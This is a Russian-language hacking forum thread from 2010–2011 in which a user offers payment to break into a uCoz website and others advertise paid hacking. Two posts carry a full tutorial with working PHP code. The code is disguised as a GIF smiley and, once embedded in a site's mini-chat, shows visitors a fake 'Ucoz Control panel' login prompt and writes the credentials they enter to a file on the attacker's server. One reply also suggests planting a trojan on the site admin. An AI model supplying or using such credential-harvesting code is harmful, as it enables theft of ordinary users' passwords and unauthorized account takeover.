Нужно взломать сайт ucoz!
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Нужно взломать сайт ucoz! - 2010-12-24 15:05:37.306666
|
|
|
zarion
Сообщений: 4
Оценки: 0
Присоединился: 2010-12-24 15:04:17.993333
|
Ребят у меня украли сайт ucoz, нужно взломать! Кто поможет , конечно в обиде не останусь заплачу! Рублеков этак 400
|
|
|
|
|
RE: Нужно взломать сайт ucoz! - 2010-12-24 15:05:54.043333
|
|
|
zarion
Сообщений: 4
Оценки: 0
Присоединился: 2010-12-24 15:04:17.993333
|
Моя аська 357-356-686
|
|
|
|
|
RE: Нужно взломать сайт ucoz! - 2010-12-26 00:06:50.393333
|
|
|
cc500
Сообщений: 63
Оценки: 0
Присоединился: 2010-12-18 03:37:19.353333
|
помогу вернуть, оплата от 1400 руб
|
|
|
|
|
RE: Нужно взломать сайт ucoz! - 2010-12-27 10:41:57.863333
|
|
|
mizer111
Сообщений: 18
Оценки: 0
Присоединился: 2010-08-20 06:09:44.800000
|
Помогу взломать , вернуть оплата 300 руб , можно частями скайп mizer7772
|
|
|
|
|
RE: Нужно взломать сайт ucoz! - 2010-12-28 16:56:48.910000
|
|
|
IF_XR
Сообщений: 42
Оценки: 0
Присоединился: 2010-12-25 17:53:20.773333
|
Zarion вот юзай, на дурняк.
Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).
Итак, начнем…
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_cооkie['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcооkie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:
И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.
Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))
стирял з HackZone.ru
ти просто "отламаеш" свой сайт :D
|
|
|
|
|
RE: Нужно взломать сайт ucoz! - 2010-12-28 17:26:04.966666
|
|
|
Milen
Сообщений: 28
Оценки: 0
Присоединился: 2010-12-27 22:04:16.930000
|
Можно админу троян закинуть=D
|
|
|
|
|
RE: Нужно взломать сайт ucoz! - 2011-01-01 19:21:20.743333
|
|
|
[The]
Сообщений: 30
Оценки: 0
Присоединился: 2010-12-26 17:46:15.306666
|
Пасиб оч дельно)Маленькая xss для большого дела)
|
|
|
|
|
RE: Нужно взломать сайт ucoz! - 2011-01-07 05:30:40.073333
|
|
|
JeliX
Сообщений: 77
Оценки: 0
Присоединился: 2010-12-22 07:46:28.920000
|
quote:
ORIGINAL: IF_XR
Zarion вот юзай, на дурняк.
Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).
Итак, начнем…
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_cооkie['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcооkie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:
И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.
Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))
стирял з HackZone.ru
ти просто "отламаеш" свой сайт :D
Юкоз уже пофиксили это года так полтора назад…
|
|
|
|
|
RE: Нужно взломать сайт ucoz! - 2011-01-07 15:10:11.466666
|
|
|
cc500
Сообщений: 63
Оценки: 0
Присоединился: 2010-12-18 03:37:19.353333
|
за 400 ты только кидал найдешь
|
|
|
|
|
|
